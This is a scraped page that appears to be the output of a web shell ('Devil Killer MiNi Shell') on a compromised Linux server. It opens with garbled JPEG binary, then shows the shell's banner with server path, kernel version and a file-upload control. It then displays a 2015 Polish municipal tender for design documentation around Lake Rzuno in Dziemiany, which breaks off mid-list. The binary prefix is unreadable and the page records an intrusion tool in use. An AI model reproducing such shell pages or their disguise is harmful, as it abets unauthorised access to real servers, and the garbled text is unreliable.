JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150915/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150915/136221-N-2015.html

<p class="kh_header"><b>Dziemiany: Opracowanie dokumentacji projektowo - kosztorysowej dotyczącej strefy aktywności w obszarze jezior Wdzydzkich obejmującą podstrefę na terenie Gminy Dziemiany</b><br>
<b>Numer ogłoszenia: 136221 - 2015; data zamieszczenia: 15.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dziemiany , ul. 8 Marca 3, 83-425 Dziemiany, woj. pomorskie, tel. 058 6880022, faks 058 6880128.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowo - kosztorysowej dotyczącej strefy aktywności w obszarze jezior Wdzydzkich obejmującą podstrefę na terenie Gminy Dziemiany.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie kompleksowej dokumentacji projektowo kosztorysowej obejmującej następujące przedsięwzięcia: 
ZADANIE 1. 	Modernizacja gminnego kąpieliska nad Jeziorem Rzuno wraz z terenem do niego przylegającym w miejscowości Dziemiany.
ZADANIE 2. 	Budowa ścieżki zdrowia wokół Jeziora Rzuno.
ZADANIE 3. 	Kompleksowa przebudowa sceny estradowej przy gminnym amfiteatrze w miejscowości Dziemiany.
Zadanie 1 obejmować będzie prace projektowe na potrzeby wykonania następujących elementów:
1)	wykonanie pomostu pływającego na gminnym kąpielisku - 1 szt.,
2)	wykonanie pływającego pomostu cumowniczego (mini mariny) dla sprzętu pływającego - 1 szt.,
3)	budowa budynku socjalno-technicznego dla ratowników wraz z ogólnodostępnymi sanitariatami i przebieralniami oraz zapleczem do przechowywania sprzętu pływającego i instalacją solarną i fotowoltaiczną - 1 szt.,
4)	modernizacja płyty i widowni boiska do siatkówki plażowej - 1 szt.,
5)	zagospodarowanie linii brzegowej jeziora przez wykonanie trawników i nasadzeń  - 3000 m2
6)	montaż lamp oświetlenia ledowego - 10 szt.

Zadanie 2 obejmować będzie prace projektowe na potrzeby wykonania następujących elementów:
1)	budowa utwardzonej ścieżki pieszej wokół Jeziora Rzuno - 1 szt.,
2)	budowa drewnianej kładki (pomostu) nad terenem podmokłym przyległym do południowej strony jeziora - 1 szt.,
3)	budowa stanic - pomostów wędkarskich - 3 szt.,
4)	budowa przystani (mini mariny) dla sprzętu pływającego przy osiedlu domków letniskowych Nowiny -  1 szt.,

Zadanie 3 obejmować będzie prace projektowe na potrzeby wykonania następujących elementów:
1)	przebudowę istniejącej sceny estradowej z zapleczem techniczno-socjalnym - 1 szt.

Dokumentację należy opracować w sposób umożliwiający Zamawiającemu uzyskanie wszystkich wymaganych uzgodnień z ostatecznym pozwoleniem na budowę włącznie wszystkich elementów będących przedmiotem zamówienia.

W zakres przedmiotu zamówienia wchodzi również  dokonanie przez Wykonawcę wszelkich poprawek, uzupełnień, modyfikacji w dokumentacji, których wykonanie będzie niezbędne dla uzyskania pozytywnej oceny i przyjęcia dokumentacji przez instytucje dokonujące oceny i kwalifikacji, także w przypadku, gdy konieczność wprowadzenia poprawek, uzupełnień i modyfikacji wystąpi po przyjęciu przez Zamawiającego przedmiotu zamówienia. 

1.	Szczegółowy opis przedmiotu zamówienia:

I.	Opis zadań:
Zadanie 1: Modernizacja kąpieliska nad Jeziorem Rzuno wraz z terenem do niego przylegającym:
1)	budowa pomostu - 1 szt.,
Istniejący pomost stacjonarny ma powierzchnię 90 m2. W związku z znacznymi wahaniami wody planuje się zaprojektowanie pomostu pływającego o pow. około 100 m2
2)	budowa mariny dla sprzętu pływającego- 1 szt.,
Zaprojektowanie pływającego pomostu cumowniczego (mini mariny) dla sprzętu pływającego o pow. około 20 m2
3)	budowa budynku socjalno-technicznego dla ratowników - 1 szt.,
Zaprojektowanie budynku socjalno-technicznego dla ratowników wraz z ogólnodostępnymi sanitariatami i przebieralniami oraz zapleczem do przechowywania sprzętu pływającego i instalacją solarną i fotowoltaiczną o pow. zabudowy ok. 40 m2
4)	modernizacja płyty i widowni boiska do siatkówki plażowej z widownią - 1 szt.,
Prace projektowe dotyczące modernizacji boiska do gry w plażową piłkę siatkową powinny uwzględnić następujące parametry:
Wymiary boiska: prostokąt 20 x 10 m ( w tym płyta boiska o wymiarach 16 x 8 m). Minimalne wyposażenie obiektu: słupki oraz tuleje, siatka o długości 8,5 m, linie boczne i końcowe. 
Wypełnienie boiska - piasek drobnoziarnisty o grubości min 40 cm
Widownia: siedziska drewniane na elementach trwale zakotwionych w gruncie na długości ok. 30 mb
5)	rozbudowę odkrytej zjeżdżalni wodnej 
6)	zagospodarowanie linii brzegowej jeziora przez wykonanie nawierzchni plaży, trawników i nasadzeń na powierzchni około 3000 m2,
7)	montaż lamp oświetlenia ledowego - 10 szt.
Lokalizacja: działka nr 83, 229/2, 60, 59, 172, obręb Dziemiany.

Zadanie 2: Budowa ścieżki zdrowia wokół Jeziora Rzuno:
1)	budowa utwardzonej ścieżki pieszej wokół Jeziora Rzuno - 1 szt.,
Zaprojektowanie ścieżki zdrowia o długości ok. 3500 m (możliwa zmiana długości w przypadku trudności z uzgodnieniem i możliwościami technicznymi wykonania), szerokości ok. 1,5, która głównie przebiegać będzie przez tereny leśne w administrowaniu Nadleśnictwa Lipusz oraz na terenach gminnych,
Utwardzenie - kruszywo kamienne sortowane, fragmentarycznie kostka brukowa (tam gdzie będzie to konieczne i możliwe) w obrzeżach 6 cm,
Wyznaczenie przy ścieżce miejsc utwardzonych na zainstalowanie elementów siłowni zewnętrznych. Planuje się zainstalowanie wzdłuż trasy ścieżki zdrowia do 10 podwójnych stanowisk z urządzeniami siłowni zewnętrznych wraz z oświetleniem hybrydowym szt. 10. Zagospodarowanie terenu w obrębie projektowanej scieżki przez wykonanie trawników i nasadzeń na powierzchni około 2000 m2
2)	budowa kładki (pomostu) nad terenem podmokłym przyległym do południowej strony jeziora - 1 szt.
Lokalizacja: działka nr 722, 229/2,  767, 388/2, 223, 393, 701, 702, 703, 405/2, 400/3 obręb Dziemiany oraz działka nr 929, 930, obręb Trzebuń.
Planuje się zaprojektowanie kładki drewnianej o konstrukcji dostosowanej do ruchu pieszo - rowerowego. Szerokość kładki musi uwzględniać możliwość poruszania się osobom 
niepełnosprawnym. Parametry kładki zostaną dobrane podczas realizacji projektu budowlanego  na podstawie badań geotechnicznych, geodezyjnych oraz obliczeń hydrologicznych i konstrukcyjnych. Oświetlenie kładki - lampy hybrydowe 2 szt.
Długość ok. 50 m. i szerokość 2 m
3)	budowa stanic - pomostów wędkarskich - 3 szt.,
Projektowane pomosty mają służyć uprawianiu wędkarstwa, cumowaniu jednostek pływających  (łodzie, kajaki) oraz być przystosowane dla osób niepełnosprawnych (balustrady i pochwyty). Pomost projektowany jest w kształcie litery T o konstrukcji stalowo - drewnianej łatwej do demontażu i ponownego montażu. Dane ogólne projektowanego pomostu do uzgodnienia na etapie projektowania. 
4)	budowa przystani (mariny) dla sprzętu pływającego przy osiedlu domków letniskowych Nowiny -  1 szt.,
Zaprojektowanie pływającego pomostu cumowniczego (mini mariny) dla sprzętu pływającego            o pow. około 20 m2 wraz z uporządkowaniem terenu przylegającego tj, plaży i terenów zielonych
5)	Wykonanie tablic informacyjnych dot. różnych form ochrony przyrody występujących na przedmiotowym obszarze

Zadanie 3: Kompleksowa przebudowa sceny estradowej przy Amfiteatrze w Dziemianach:
Lokalizacja: działka nr 77/15, obręb Dziemiany
1)	zadanie obejmuje kompleksowe zaprojektowanie przebudowy istniejącej sceny estradowej z doprojektowaniem zaplecza techniczno-socjalnego - 1 szt.
Obecnie istniejąca scena składa się z fundamentu kamienno-betonowego, na którym jest posadowiona wiata o konstrukcji drewnianej z dwuspadowym dachem. Wymiary zewnętrzne obiektu to ok. 12x6 m,
Wymagania dotyczące modernizacji:
Planuje się zaprojektowanie nowej części nadziemnej budowli w formie muszli koncertowej o konstrukcji drewnianej z wykorzystaniem istniejącego fundamentu i dobudowaniem pomieszczeń zaplecza techniczno  - socjalnego.
Planuje się, że powierzchnia zabudowy tego obiektu będzie wynosić około 100 m2
 W opracowaniu należy też ująć rozbudowę widowni z prefabrykatów betonowych o powierzchnię około 50 m2 oraz wykonanie dodatkowych ciągów komunikacyjnych i zagospodarowanie terenów zielonych.

II.	Dokumenty projektowe wymagane w ramach ww. zadań:

1.	PROJEKT KONCEPCYJNY
Projekt koncepcyjny powinien być sporządzony na podstawie wytycznych określonych na wspólnych spotkaniach z osobami wyznaczonymi przez Zamawiającego (spotkania takie powinny odbywać się co najmniej 1 raz w tygodniu w siedzibie Zamawiającego, przez okres opracowania koncepcji, osoby uczestniczące w spotkaniach muszą posiadać uprawnienia w niezbędnym, omawianym zakresie).

Koncepcja powinna zawierać szacunek kosztów  o szczegółowości fazy opracowania oraz  wizualizacje (3D). Wstępne opracowania koncepcji powinny być przygotowane  50  dni po podpisaniu umowy.

2.	MAPY DO CELÓW PROJEKTOWYCH
3.	PROJEKT BUDOWLANY I WYKONAWCZY
Opracowanie wielobranżowego projektu budowlanego i wykonawczego na podstawie koncepcji  zgodny z Ustawą z dnia 7 lipca 1994 r. Prawo budowlane oraz rozporządzeniem Ministra Infrastruktury w spawie szczegółowego zakresu i formy projektu budowlanego. Projekty wykonawcze (dla każdej z branż) będą posiadały szczegółowe rozwiązania projektowo materiałowe z podaniem technologii wykonania w uzgodnieniu z Zamawiającym.
Ponadto należy uzyskać wszystkie inne uzgodnienia podmiotów zewnętrznych oraz ewentualne odstępstwa od obowiązujących warunków technicznych celem uzyskania decyzji o pozwoleniu na budowę.
Forma i standard wykończenia powinny uwzględniać sposób przeznaczenia obiektu. Użyte materiały wykończeniowe powinny się cechować dużą trwałością użytkową. 

Bezwzględnie wymagane jest spełnienie wymagań bezpieczeństwa pożarowego, bezpieczeństwa użytkowania, odpowiednich warunków higienicznych i zdrowotnych oraz ochrony środowiska, ochrony przed hałasem i drganiami, oszczędności energii i odpowiedniej izolacyjności cieplnej przegród.

4.	KOSZTORYSY I SPECYFIKACJE TECHNICZNE
Kosztorys  inwestorski  należy sporządzić, zgodnie z rozporządzeniem Ministra Infrastruktury               z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robot budowlanych określonych w programie funkcjonalno-użytkowym (Dz.U. 2004 r. Nr 130, poz. 1389 ze zm.). W przypadku braku ceny jednostkowej zgodnie do Rozporządzenia cenę jednostkową należy ustalić na podstawie kalkulacji indywidualnej. Kalkulacje dołączyć do kosztorysu  inwestorskiego.

	Przedmiary robót należy sporządzać w oparciu o projekty budowlano-wykonawcze, dane wynikające z ekspertyz technicznych i planu zagospodarowania terenu oraz specyfikacji technicznej wykonania i odbioru robót budowlanych, i zestawienia wyposażenia obiektów. Przedmiary robót mają obejmować zestawienie planowanych robót  w kolejności technologicznej ich wykonania, obliczenie i podanie ilości ustalonych jednostek przedmiarowych, wskazanie podstaw do ustalenia szczegółowego opisu robót lub szczegółowy opis robót obejmujący wyszczególnienie i opis czynności wchodzących w zakres robót, sporządzone przed wykonaniem robót na podstawie dokumentacji projektowej i specyfikacji technicznej wykonania i odbioru robót.       
	
	Specyfikacja techniczna warunków wykonania i odbioru robót: w oparciu o Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. (Dz. U. 2004 Nr 202, poz. 2072 ze zm.) w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego. Opracowanie ma zawierać zbiory wymagań w zakresie sposobu wykonania robót budowlanych, obejmujące w szczególności wymagane właściwości materiałów, wymagania dotyczące sposobu wykonania i oceny prawidłowości wykonania poszczególnych robót oraz określenie zakresu prac, które powinny być ujęte w cenach poszczególnych pozycji przedmiaru. 
Tworząc dokumentacje projektowo- kosztorysową, wykonawca - projektant  ma obowiązek opisać przedmiot zamówienia zgodnie z Prawem Zamówień Publicznych  art. 29 i 30.  

III.	Pozostałe opracowania do wykonania:

Studia wykonalności:
Zadanie 1: Modernizacja kąpieliska nad Jeziorem Rzuno wraz z terenem do niego przylegającym:
Studium wykonalności obejmujące w swoim zakresie:
a.	wymianę istniejącego pomostu,
b.	budowę przystani (małej mariny) dla sprzętu pływającego,
c.	budowę budynku socjalno-technicznego dla ratowników z zapleczem sanitarnym oraz miejscem do przechowywania sprzętu pływającego (kajaki, łódki etc.),
d.	rozbudowę zjeżdżalni,
e.	modernizację płyty i widowni boiska do piłki siatkowej plażowej,
f.	     wykonanie nawierzchni plaży i pozostałych terenów zielonych.

Zadanie 2: Budowa ścieżki zdrowia wokół Jeziora Rzuno:
Studium wykonalności obejmujące w swoim zakresie:
a.	budowę utwardzonej ścieżki pieszej wokół Jeziora Rzuno (poza terenami urbanistycznymi), 
b.	montaż urządzeń do ćwiczeń,
c.	zagospodarowanie zieleni, głównie przy południowym brzegu Jeziora (przy terenach zurbanizowanych) oraz przy Osiedlu Nowiny,
d.	budowa kładki (pomostu) nad terenem podmokłym przyległym do południowej strony jeziora,
e.	budowa stanic - pomostów wędkarskich,
f.	     budowę przystani (małej mariny) dla sprzętu pływającego przy osiedlu Nowiny,
g.	montaż tablic informacyjnych dot. różnych form ochrony przyrody występujących na danym obszarze.

Zadanie 3: Kompleksowa przebudowa sceny estradowej przy Amfiteatrze w Dziemianach:
Studium wykonalności obejmujące w swoim zakresie:
a.	kompleksową przebudowę sceny estradowej z zapleczem techniczno-socjalnym,
b.	rozbudowę widowni,
c.	wykonanie ciągów komunikacyjnych, wykonanie terenów zielonych.

Studium wykonalności należy opracować zgodnie z Wytycznymi do Studiów Wykonalności stanowiących załącznik do wniosku o dofinansowanie projektu z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Pomorskiego na lata 2014-2020

IV.	Pozostałe wymagania stawiane wykonawcy:

a.	Dokumentację projektową należy wykonać zgodnie z obowiązującymi przepisami, normami oraz ze sztuką budowlaną.
b.	Dokumentacja powinna być zaopatrzona w wykaz opracowań oraz pisemne oświadczenie Wykonawcy, że jest wykonana zgodnie z obowiązującymi przepisami i zasadami wiedzy technicznej oraz że została wykonana w stanie kompletnym z punktu widzenia celu, któremu ma służyć. Wykaz opracowań oraz pisemne oświadczenie, o którym mowa wyżej stanowią integralną część przedmiotu odbioru.
c.	Informacje zawarte w dokumentacji projektowej w zakresie technologii wykonania robót, doboru materiałów i urządzeń należy określić w sposób zgodny z przepisami ustawy Prawo zamówień publicznych, by zapewnić konkurencyjność przy zamawianiu tych wyrobów uwzględniając zapis art. 30 ww. ustawy W przypadku użycia w dokumentacji projektowo-kosztorysowej znaków towarowych, patentów lub pochodzenia Wykonawca musi dodatkowo sporządzić opis urządzeń oraz materiałów równoważnych wraz z określeniem parametrów równoważności.
d.	Zastosowane w rozwiązaniach projektowych wyroby budowlane (materiały i urządzenia) muszą być dopuszczone do obrotu i powszechnego stosowania.
e.	Dokumentację należy dostarczyć oprócz wersji papierowej również w wersji elektronicznej zapisanej na płycie CD lub DVD z zachowaniem określonego formatu plików:
i.	dla rysunków - pliki w formacie dwg oraz pdf
ii.	dla kosztorysów - pliki w formacie ath oraz pdf
iii.	dla części opisowej - pliki w formacie doc oraz pdf.
f.	     Do obowiązków zamawiającego należy przeprowadzenie konsultacji społecznych w siedzibie Zamawiającego (sala zostanie udostępniona przez Zamawiającego) w ilości:
- dokumentacja techniczno-kosztorysowa - min. 2 spotkania,
- studium wykonalności - min. 1 spotkanie
g.	Do pozostałych obowiązków Wykonawcy należy w szczególności:
i. Poniesienie kosztu opracowania podkładów geodezyjnych niezbędnych do wykonania projektów budowlanych.
ii.	Uzyskanie zgód właścicieli na dysponowanie nieruchomością do celów budowlanych.
iii.	Bieżące uzgadnianie prac projektowych i każdorazowe uzyskiwanie akceptacji Zamawiającego dla proponowanych rozwiązań projektowych.
iv.	Sprawdzenie dokumentacji projektowej przez osobę posiadającą wymagane uprawnienia. Każdy egzemplarz dokumentacji projektowej musi być podpisany przez projektanta i sprawdzającego. 
v.	Przedłożenie Zamawiającemu opracowanej dokumentacji projektowej do zatwierdzenia przed złożeniem wniosku o wydanie pozwolenia na budowę, w terminie umożliwiającym wprowadzenie ewentualnych zmian do projektu.
vi.	Uzyskanie w imieniu Zamawiającego i dostarczenie na własny koszt wszelkich wymaganych, zgodnie z polskim prawem, uzgodnień, warunków, opinii, sprawdzeń rozwiązań projektowych i decyzji administracyjnych niezbędnych do opracowania dokumentacji projektowo - kosztorysowej i uzyskania na jej podstawie pozwolenia na budowę m.in.:
1.	decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia z klauzulą ostateczności (w przypadku konieczności wykonania);
2.	decyzji o ustaleniu lokalizacji inwestycji celu publicznego z klauzulą ostateczności (w przypadku konieczności wykonania).
vii.	Uzyskanie w imieniu Zamawiającego decyzji o pozwoleniu na budowę z klauzulą ostateczności. Wszelkie koszty z tym związane ponosi Wykonawca.
viii.	Dokonywania ewentualnych zmian dotyczących pozwolenia na budowę będących następstwem nienależytego wykonania przedmiotu w ramach niniejszej umowy.
ix.	Udzielanie poprzez Zamawiającego odpowiedzi na zapytania Wykonawców w zakresie będącym przedmiotem niniejszego postępowania na etapie prowadzenia procedury przetargowej.
x.	Nieodpłatne uaktualnianie kosztorysów na żądanie Zamawiającego do czasu zakończenia inwestycji.


71.24.20.00-6 	Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów
71.24.10.00-9 	Studia wykonalności, usługi doradcze, analizy
71.22.30.00-7 	Usługi architektoniczne w zakresie rozbudowy obiektów budowlanych,.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.24.20.00-6, 71.24.10.00-9, 71.22.30.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający wymaga wniesienia wadium w wysokości 2 000,00 zł. (słownie: dwa tysiące złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże wykonanie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 dokumentacji projektowej o wartości nie mniejszej niż 30 000,00 zł brutto</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca w załączniku do oferty zamieści wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, posiadających wymagane polskim prawem budowlanym uprawnienia danej specjalności do pełnienia samodzielnych funkcji technicznych w budownictwie lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, albo też posiadającą zdobyte w innych państwach równoważne kwalifikacje zawodowe, które zostały uznane na zasadach określonych w ustawie z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r., Nr 63, poz. 394 ze zm.), w tym przynajmniej 1 osoby posiadającej uprawnienia budowlane do projektowania w specjalności konstrukcyjno - budowlanej. Ocena spełnienia warunku nastąpi wg formuły spełnia / nie spełnia na podstawie zapisów zawartych w wykazie osób</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

